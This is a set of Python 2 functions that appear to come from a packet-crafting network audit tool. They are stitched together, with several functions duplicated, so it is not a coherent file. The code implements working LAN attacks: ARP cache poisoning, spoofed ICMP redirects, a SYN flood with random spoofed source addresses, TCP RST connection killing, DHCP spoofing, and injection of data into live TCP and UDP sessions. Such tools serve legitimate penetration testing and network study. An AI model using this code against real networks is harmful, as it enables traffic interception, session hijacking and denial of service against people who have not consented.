def __main_thread(self, server, targets):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(5)
if ':' in server:
server, port = server.split(':', 1)
else:
port = 53
try:
port = int(port)
except:
port = 53
sock.connect((server, port))
for target in targets:
dnsqr = MetaPacket.new('dnsqr')
dnsqr.set_field('dnsqr.qname', target)
mpkt = MetaPacket.new('dns')
mpkt.set_fields('dns', {
'id' : randint(0, 2L**16-1),
'qd' : dnsqr})
sock.send(mpkt.get_raw())
def send_redirect(self, sip, dip):
key = sip + ':' + dip
delay = self.connections.get(key, None)
if delay and (time.time() - delay) <= self.delay:
return
self.connections[key] = time.time()
pkt = MetaPacket.new('ip') / MetaPacket.new('icmp')
pkt.set_field('ip.src', self.gateway)
pkt.set_field('ip.dst', dip)
pkt.set_field('icmp.type', 5) # Redirect
pkt.set_field('icmp.code', 0) # Redirect for network
pkt.set_field('icmp.gw', self.source)
self.packets += 1
self.session.context.si_l3(pkt)
self.session.output_page.user_msg(
_('%s to %s matches - redirect to %s') % (sip, dip, self.source),
STATUS_INFO, AUDIT_NAME)
self.summary = AUDIT_MSG % (_('%d redirects sent') % self.packets)
self.percentage = (self.percentage + 536870911) % \
gobject.G_MAXINT
def send_redirect(self, sip, dip):
key = sip + ':' + dip
delay = self.connections.get(key, None)
if delay and (time.time() - delay) <= self.delay:
return
self.connections[key] = time.time()
pkt = MetaPacket.new('ip') / MetaPacket.new('icmp')
pkt.set_field('ip.src', self.gateway)
pkt.set_field('ip.dst', dip)
pkt.set_field('icmp.type', 5) # Redirect
pkt.set_field('icmp.code', 0) # Redirect for network
pkt.set_field('icmp.gw', self.source)
self.packets += 1
self.session.context.si_l3(pkt)
self.session.output_page.user_msg(
_('%s to %s matches - redirect to %s') % (sip, dip, self.source),
STATUS_INFO, AUDIT_NAME)
self.summary = AUDIT_MSG % (_('%d redirects sent') % self.packets)
self.percentage = (self.percentage + 536870911) % \
gobject.G_MAXINT
def __thread_main(self):
try:
log.debug('Entered in __thread_main')
packets = 0
probes = self.probes
while probes != 0 and self.internal:
pkt = MetaPacket.new('ip') / MetaPacket.new('tcp')
if self.sip is True:
sip = random_ip()
elif self.sip != '0.0.0.0':
sip = self.sip
if self.sport is True:
sport = randint(1, 65535)
else:
sport = self.sport
pkt.set_fields('ip', {
'dst' : self.dip,
'src' : sip})
pkt.set_fields('tcp', {
'sport' : sport,
'dport' : self.dport,
'flags' : TH_SYN,
'seq' : randint(0, 2L**32-1)})
self.context.si_l3(pkt)
sleep(self.delay)
probes -= 1
packets += 1
if self.probes > 0:
self.summary = AUDIT_MSG % _('%d of %d sent' \
% (packets, self.probes))
self.percentage = (packets / float(self.probes)) * 100.0
else:
self.summary = AUDIT_MSG % _('%d sent' % packets)
self.percentage = (self.percentage + 536870911) % \
gobject.G_MAXINT
if self.internal:
self.summary = AUDIT_MSG % _('Finished with %d sent' % packets)
self.internal = False
else:
self.summary = AUDIT_MSG % _('stopped')
self.percentage = 100.0
self.state = self.NOT_RUNNING
except Exception, err:
log.error(generate_traceback())
def __thread_main(self):
try:
log.debug('Entered in __thread_main')
packets = 0
probes = self.probes
while probes != 0 and self.internal:
pkt = MetaPacket.new('ip') / MetaPacket.new('tcp')
if self.sip is True:
sip = random_ip()
elif self.sip != '0.0.0.0':
sip = self.sip
if self.sport is True:
sport = randint(1, 65535)
else:
sport = self.sport
pkt.set_fields('ip', {'dst': self.dip, 'src': sip})
pkt.set_fields(
'tcp', {
'sport': sport,
'dport': self.dport,
'flags': TH_SYN,
'seq': randint(0, 2L**32 - 1)
})
self.context.si_l3(pkt)
sleep(self.delay)
probes -= 1
packets += 1
if self.probes > 0:
self.summary = AUDIT_MSG % _('%d of %d sent' \
% (packets, self.probes))
self.percentage = (packets / float(self.probes)) * 100.0
else:
self.summary = AUDIT_MSG % _('%d sent' % packets)
self.percentage = (self.percentage + 536870911) % \
gobject.G_MAXINT
if self.internal:
self.summary = AUDIT_MSG % _('Finished with %d sent' % packets)
self.internal = False
else:
self.summary = AUDIT_MSG % _('stopped')
self.percentage = 100.0
self.state = self.NOT_RUNNING
except Exception, err:
log.error(generate_traceback())
def send_tcpkill(ctx, src, dst, sport, dport, seq):
mpkt = MetaPacket.new('ip') / MetaPacket.new('tcp')
mpkt.set_fields('ip', {'src': src, 'dst': dst})
mpkt.set_fields('tcp', {
'sport': sport,
'dport': dport,
'seq': seq,
'ack': 0,
'flags': TH_RST
})
ctx.si_l3(mpkt)
def send_tcpkill(ctx, src, dst, sport, dport, seq):
mpkt = MetaPacket.new('ip') / MetaPacket.new('tcp')
mpkt.set_fields('ip', {
'src' : src,
'dst' : dst})
mpkt.set_fields('tcp', {
'sport' : sport,
'dport' : dport,
'seq' : seq,
'ack' : 0,
'flags' : TH_RST})
ctx.si_l3(mpkt)
def send_dhcp(self, sip, dip, dmac, bootpkt):
mpkt = MetaPacket.new('eth') / \
MetaPacket.new('ip') / \
MetaPacket.new('udp') / bootpkt
mpkt.set_field('eth.dst', dmac)
mpkt.set_field('ip.src', sip)
mpkt.set_field('ip.dst', dip)
mpkt.set_field('udp.sport', 67)
mpkt.set_field('udp.dport', 68)
self.percentage = (self.percentage + 536870911) % \
gobject.G_MAXINT
self.session.context.si_l2(mpkt)
def send_icmp_echo(self, ctx, sip, dip, smac, dmac):
mpkt = MetaPacket.new('eth') / \
MetaPacket.new('ip') / \
MetaPacket.new('icmp') / \
MetaPacket.new('raw')
mpkt.set_field('eth.dst', dmac)
mpkt.set_field('eth.src', smac)
mpkt.set_field('ip.src', sip)
mpkt.set_field('ip.dst', dip)
mpkt.set_field('raw.load', ping_payload)
#log.info(mpkt.summary())
#log.info('Sending ICMP echo (%s -> %s) [%s -> %s]' % (
# sip, dip, smac, dmac))
ctx.si_l2(mpkt)
def __ping_thread(self):
# TODO: maybe will be better to use IPy or something
# like that to handle also IPv6
ip = unpack('!I', inet_aton(self.ip))[0]
nm = unpack('!I', inet_aton(self.netmask))[0]
last = unpack('!I', '\xff\xff\xff\xff')[0]
start = ip & nm
end = (last ^ nm) | ip
sent = 0
totals = float(end - start)
# NB: With this method we ping also broadcast and reserved
# addresses
pkt = MetaPacket.new('eth') / MetaPacket.new('arp')
pkt.set_field('eth.src', self.sess.context.get_mac1())
pkt.set_field('eth.dst', 'ff:ff:ff:ff:ff:ff')
pkt.set_field('arp.hwsrc', self.sess.context.get_mac1())
pkt.set_field('arp.hwdst', '00:00:00:00:00:00')
pkt.set_field('arp.psrc', self.sess.context.get_ip1())
while self.internal and start <= end:
pkt.set_field('arp.pdst', inet_ntoa(pack('!I', start)))
self.sess.context.si_l2(pkt)
time.sleep(0.01)
self.percentage = (sent / totals) * 100.0
start += 1
sent += 1
if not self.internal:
self.summary = AUDIT_MSG % _('stopped')
self.sess.output_page.user_msg(
_('Scanning for hosts on iface %s with IP: %s and Netmask: %s stopped') \
% (self.iface, self.ip, self.netmask), STATUS_WARNING, AUDIT_NAME)
else:
self.summary = AUDIT_MSG % _('finished')
self.sess.output_page.user_msg(
_('Scanning for hosts on iface %s with IP: %s and Netmask: %s finished') \
% (self.iface, self.ip, self.netmask), STATUS_INFO, AUDIT_NAME)
self.internal = False
self.state = self.NOT_RUNNING
self.percentage = 100.0
def send_arp(self, ctx, type, sip, smac, dip, dmac):
mpkt = MetaPacket.new('eth') / MetaPacket.new('arp')
mpkt.set_field('eth.dst', dmac)
if type == ARP_REQUEST:
dmac = '00:00:00:00:00:00'
mpkt.set_field('arp.op', type)
mpkt.set_field('arp.hwsrc', smac)
mpkt.set_field('arp.hwdst', dmac)
mpkt.set_field('arp.psrc', sip)
mpkt.set_field('arp.pdst', dip)
#log.info(mpkt.summary())
#log.info('Sending %s (%s -> %s) [%s -> %s]' % (
# type == ARP_REQUEST and 'who-has' or 'is-at',
# sip, dip, smac, dmac))
ctx.si_l2(mpkt)
def inject_buffer(ctx, conn, index, buff):
if conn.l4_proto == NL_TYPE_TCP:
proto = 'tcp'
elif conn.l4_proto == NL_TYPE_UDP:
proto = 'udp'
else:
return False
mpkt = MetaPacket.new('ip') / MetaPacket.new(proto)
if index == 0:
mpkt.l3_src = conn.l3_addr1
mpkt.l3_dst = conn.l3_addr2
mpkt.l4_src = conn.l4_addr1
mpkt.l4_dst = conn.l4_addr2
else:
mpkt.l3_src = conn.l3_addr2
mpkt.l3_dst = conn.l3_addr1
mpkt.l4_src = conn.l4_addr2
mpkt.l4_dst = conn.l4_addr1
mpkt.l4_proto = conn.l4_proto
mpkt.set_fields('ip', {
'src' : mpkt.l3_src,
'dst' : mpkt.l3_dst})
mpkt.set_fields(proto, {
'sport' : mpkt.l4_src,
'dport' : mpkt.l4_dst})
mpkt.inject = buff
mpkt.inject_len = len(buff)
index += 2
conn.flags = CN_INJECTED
conn.buffers.append((index, buff))
ctx.inject_buffer(mpkt)
return True
def poison(self, sess, host, target, hwsrc, hwdst, packets, delay):
pkt = MetaPacket.new('eth') / MetaPacket.new('arp')
if hwdst:
pkt.set_field('eth.dst', hwdst)
pkt.set_field('arp.hwdst', hwdst)
else:
pkt.set_field('arp.hwdst', 'ff:ff:ff:ff:ff:ff')
pkt.set_field('arp.op', 'is-at')
pkt.set_field('arp.psrc', host)
pkt.set_field('arp.pdst', target)
if hwsrc:
pkt.set_field('arp.hwsrc', hwsrc)
self.status.info(_('Starting ARP cache poison against %s '
'(capturing packets directed to %s)') % (target, host))
send = sess.context.s_l2(pkt, repeat=packets, delay=delay)
def inject_buffer(ctx, conn, index, buff):
if conn.l4_proto == NL_TYPE_TCP:
proto = 'tcp'
elif conn.l4_proto == NL_TYPE_UDP:
proto = 'udp'
else:
return False
mpkt = MetaPacket.new('ip') / MetaPacket.new(proto)
if index == 0:
mpkt.l3_src = conn.l3_addr1
mpkt.l3_dst = conn.l3_addr2
mpkt.l4_src = conn.l4_addr1
mpkt.l4_dst = conn.l4_addr2
else:
mpkt.l3_src = conn.l3_addr2
mpkt.l3_dst = conn.l3_addr1
mpkt.l4_src = conn.l4_addr2
mpkt.l4_dst = conn.l4_addr1
mpkt.l4_proto = conn.l4_proto
mpkt.set_fields('ip', {'src': mpkt.l3_src, 'dst': mpkt.l3_dst})
mpkt.set_fields(proto, {'sport': mpkt.l4_src, 'dport': mpkt.l4_dst})
mpkt.inject = buff
mpkt.inject_len = len(buff)
index += 2
conn.flags = CN_INJECTED
conn.buffers.append((index, buff))
ctx.inject_buffer(mpkt)
return True
def __main_thread(self, server, targets):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(5)
if ':' in server:
server, port = server.split(':', 1)
else:
port = 53
try:
port = int(port)
except:
port = 53
sock.connect((server, port))
for target in targets:
dnsqr = MetaPacket.new('dnsqr')
dnsqr.set_field('dnsqr.qname', target)
mpkt = MetaPacket.new('dns')
mpkt.set_fields('dns', {'id': randint(0, 2L**16 - 1), 'qd': dnsqr})
sock.send(mpkt.get_raw())
def __init__(self, sess, ip, delay, probes, report):
AuditOperation.__init__(self)
self.session = sess
self.pkt = MetaPacket.new('arp')
self.pkt.set_field('arp.pdst', ip)
self.delay = delay
self.probes = probes
self.report = report
self.packets = 0
self.times = []
self.sender = None
def execute_audit(self, sess, inp_dict):
datalink = sess.context.datalink()
if datalink not in (IL_TYPE_ETH, IL_TYPE_TR, IL_TYPE_FDDI):
self.status.error(_('Could not run arpcachepoison. Datalink '
'not supported. Ethernet needed.'))
return False
host = inp_dict['host']
hwsrc = inp_dict['hwsrc']
target = inp_dict['target']
packets = inp_dict['packets']
delay = max(300, inp_dict['delay'])
if packets <= 0:
packets = -1
if not is_ip(host):
self.status.error(_('Not a valid IP address for host'))
return False
if not is_ip(target):
self.status.error(_('Not a valid IP address for target'))
return False
if hwsrc and not is_mac(hwsrc):
self.status.error(_('Not a valid MAC address for hwsrc'))
return False
if target != '0.0.0.0':
# We have to solve the IP as MAC address
pkt = MetaPacket.new('arp')
pkt.set_field('arp.pdst', target)
sess.context.sr_l3(pkt, timeout=4,
onerror=self.on_error,
onreply=self.on_resolved,
udata=(sess, host, target, hwsrc, packets, delay))
self.status.info(_('Trying to resolve IP: %s') % target)
else:
self.poison(sess, host, target, hwsrc, '', packets, delay)
return True
def udp_injector(context, mpkt, length):
mpkt.set_fields('udp', {
'sport' : mpkt.l4_src,
'dport' : mpkt.l4_dst,
'chksum' : None})
length += UDP_LENGTH
mpkt.session = None
injector = AuditManager().get_injector(0, STATELESS_IP_MAGIC)
is_ok, length = injector(context, mpkt, length)
length = context.get_mtu() - length
if length > mpkt.inject_len:
length = mpkt.inject_len
payload = mpkt.inject[:length]
payload_pkt = MetaPacket.new('raw')
payload_pkt.set_field('raw.load', payload)
mpkt.add_to('udp', payload_pkt)
return True, length
def udp_injector(context, mpkt, length):
mpkt.set_fields('udp', {
'sport': mpkt.l4_src,
'dport': mpkt.l4_dst,
'chksum': None
})
length += UDP_LENGTH
mpkt.session = None
injector = AuditManager().get_injector(0, STATELESS_IP_MAGIC)
is_ok, length = injector(context, mpkt, length)
length = context.get_mtu() - length
if length > mpkt.inject_len:
length = mpkt.inject_len
payload = mpkt.inject[:length]
payload_pkt = MetaPacket.new('raw')
payload_pkt.set_field('raw.load', payload)
mpkt.add_to('udp', payload_pkt)
return True, length
def _inject_tcp(self, context, mpkt, length):
"""
Function that manages injection of fragments in active TCP connection
"""
ident = TCPIdent.create(mpkt)
sess = SessionManager().get_session(ident)
if not sess:
log.debug("No TCP session found.")
return False, length
if ident.l3_src == sess.ident.l3_src:
status = sess.data[1]
ostatus = sess.data[0]
else:
status = sess.data[0]
ostatus = sess.data[1]
mpkt.set_fields('tcp', {
'sport' : mpkt.l4_src,
'dport' : mpkt.l4_dst,
'dataofs' : 5,
'chksum' : None,
'urgptr' : 0,
'flags' : TH_PSH,
'options' : {}})
if status.injectable & INJ_FIN or \
not status.injectable & INJ_FWD or \
not ostatus.injectable & INJ_FWD:
log.debug("Session is not injectable.")
return False, length
mpkt.set_fields('tcp', {
'seq' : status.last_seq + status.seq_adj,
'ack' : status.last_ack - ostatus.seq_adj})
if status.last_ack != 0:
mpkt.set_field('tcp.flags', mpkt.l4_flags | TH_ACK)
mpkt.session = sess.prev
length += 20 + mpkt.l2_len
injector = AuditManager().get_injector(0, mpkt.session.ident.magic)
is_ok, length = injector(context, mpkt, length)
if not is_ok:
return is_ok, length
length = context.get_mtu() - length
if length > mpkt.inject_len:
length = mpkt.inject_len
payload = mpkt.inject[:length]
payload_pkt = MetaPacket.new('raw')
payload_pkt.set_field('raw.load', payload)
mpkt.add_to('tcp', payload_pkt)
status.seq_adj += length
mpkt.data_len = length
return True, length